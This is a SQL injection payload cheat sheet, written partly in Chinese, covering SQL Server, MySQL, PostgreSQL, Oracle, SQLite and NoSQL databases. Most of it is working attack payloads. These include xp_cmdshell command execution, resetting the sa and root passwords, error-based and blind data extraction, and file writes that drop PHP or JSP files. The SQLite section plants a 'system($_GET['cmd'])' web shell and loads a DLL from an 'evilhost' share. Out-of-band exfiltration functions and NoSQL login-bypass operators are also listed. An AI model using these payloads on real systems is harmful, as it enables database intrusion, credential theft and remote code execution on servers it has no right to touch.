1. SQL Server Payload
1.1. 常见Payload
Version
SELECT @@version
Comment
SELECT 1 -- comment
SELECT /*comment*/1Space
0x01 - 0x20
用户信息
SELECT user_name()
SELECT system_user
SELECT user
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID用户权限
select IS_SRVROLEMEMBER('sysadmin')
select IS_SRVROLEMEMBER('db_owner')List User
SELECT name FROM master..syslogins数据库信息
SELECT name FROM master..sysdatabases
select concat_ws(table_schema,table_name,column_name) from information_schema.columns
select quotename(name) from master..sysdatabases FOR XML PATH('')执行命令
EXEC xp_cmdshell 'net user'Ascii
SELECT char(0x41)
SELECT ascii('A')
SELECT char(65)+char(66) => return ABDelay
WAITFOR DELAY '0:0:3' pause for 3 secondsChange Password
ALTER LOGIN [sa] WITH PASSWORD=N'NewPassword'Trick
id=1 union:select password from:user文件读取
OpenRowset
当前查询语句
select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle)hostname
用于判断是否站库分离
select host_name()
exec xp_getnetname服务器信息
exec xp_msver
1.2. 注册表读写
xp_regread
exec xp_regread N'HKEY_LOCAL_MACHINE', N'SYSTEMCurrentControlSetServicesMSSEARCH'
xp_regwrite
xp_regdeletvalue
xp_regdeletkey
xp_regaddmultistring
1.3. 报错注入
1=convert(int,(db_name()))
1.4. 常用函数
SUSER_NAME()
USER_NAME()
PERMISSIONS()
DB_NAME()
FILE_NAME()
TYPE_NAME()
COL_NAME()
1.5. DNS OOB
fn_xe_file_target_read_file
fn_get_audit_file
fn_trace_gettable
1.6. 其他常用存储过程
sp_execute_external_script
sp_makewebtask
sp_OACreate
sp_OADestroy
sp_OAGetErrorInfo
sp_OAGetProperty
sp_OAMethod
sp_OASetProperty
sp_OAStop
xp_cmdshell
xp_dirtree
xp_enumerrorlogs
xp_enumgroups
xp_fixeddrives
xp_getfiledetails
xp_loginconfig
2. MySQL Payload
2.1. 常见Payload
Version
SELECT @@version
Comment
SELECT 1 -- comment
SELECT 1 # comment
SELECT /*comment*/1Space
0x9 0xa-0xd 0x20 0xa0
Current User
SELECT user()
SELECT system_user()List User
SELECT user FROM mysql.userCurrent Database
SELECT database()List Database
SELECT schema_name FROM information_schema.schemataList Tables
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'List Columns
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'If
SELECT if(1=1,'foo','bar'); return 'foo'Ascii
SELECT char(0x41)
SELECT ascii('A')
SELECT 0x414243 => return ABCDelay
sleep(1)
SELECT BENCHMARK(1000000,MD5('A'))Read File
select @@datadir
select load_file('databasename/tablename.MYD')Blind
ascii(substring(str,pos,length)) & 32 = 1Error Based
select count(*),(floor(rand(0)*2))x from information_schema.tables group by x;
select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))Change Password
mysql -uroot -e "use mysql;UPDATE user SET password=PASSWORD('newpassword') WHERE user='root';FLUSH PRIVILEGES;"2.1.1. 报错注入常见函数
extractvalue
updatexml
GeometryCollection
linestring
multilinestring
multipoint
multipolygon
polygon
exp
2.2. 写文件
2.2.1. 写文件前提
root 权限
知晓文件绝对路径
写入的路径存在写入权限
secure_file_priv 允许向对应位置写入
select count(file_priv) from mysql.user
2.2.2. 基于 into 写文件
union select 1,1,1 into outfile '/tmp/demo.txt'
union select 1,1,1 into dumpfile '/tmp/demo.txt'dumpfile和outfile不同在于,outfile会在行末端写入新行,会转义换行符,如果写入二进制文件,很可能被这种特性破坏
2.2.3. 基于 log 写文件
show variables like '%general%';
set global general_log = on;
set global general_log_file = '/path/to/file';
select '<?php var_dump("test");?>';
set global general_log_file = '/original/path';
set global general_log = off;3. PostgresSQL Payload
Version
SELECT version()Comment
SELECT 1 -- comment
SELECT /*comment*/1Current User
SELECT user
SELECT current_user
SELECT session_user
SELECT getpgusername()List User
SELECT usename FROM pg_userCurrent Database
SELECT current_database()List Database
SELECT datname FROM pg_databaseAscii
SELECT char(0x41)
SELECT ascii('A')Delay
pg_sleep(1)4. Oracle Payload
4.1. 常见Payload
dump
select * from v$tablespace;
select * from user_tables;
select column_name from user_tab_columns where table_name = 'table_name';
select column_name, data_type from user_tab_columns where table_name = 'table_name';
SELECT * FROM ALL_TABLESComment
--
/**/Space
0x00 0x09 0xa-0xd 0x20
报错
utl_inaddr.get_host_name
ctxsys.drithsx.sn
ctxsys.CTX_REPORT.TOKEN_TYPE
XMLType
dbms_xdb_version.checkin
dbms_xdb_version.makeversioned
dbms_xdb_version.uncheckout
dbms_utility.sqlid_to_sqlhash
ordsys.ord_dicom.getmappingxpath
utl_inaddr.get_host_name
utl_inaddr.get_host_address
OOB
utl_http.request
utl_inaddr.get_host_address
SYS.DBMS_LDAP.INIT
HTTPURITYPE
HTTP_URITYPE.GETCLOB
绕过
rawtohex
4.2. 写文件
create or replace directory TEST_DIR as '/path/to/dir';
grant read, write on directory TEST_DIR to system;
declare
isto_file utl_file.file_type;
begin
isto_file := utl_file.fopen('TEST_DIR', 'test.jsp', 'W');
utl_file.put_line(isto_file, '<% out.println("test"); %>');
utl_file.fflush(isto_file);
utl_file.fclose(isto_file);
end;5. SQLite3 Payload
Comment
--
/**/Version
select sqlite_version();Command Execution
ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--Load_extension
UNION SELECT 1,load_extension('\evilhostevil.dll','E');--6. NoSQL Payload
6.1. 常见Payload
绕过限制条件
{"username": "user"} => {"username": {"ne": "fakeuser"}}
{"$where": "return true"}测试用字符
'"/$[].>
布尔测试常用
{"$ne": -1}
{"$in": []}
{"$where": "return true"}
{"$or": [{},{"foo":"1"}]}时间
{"$where": "sleep(100)"}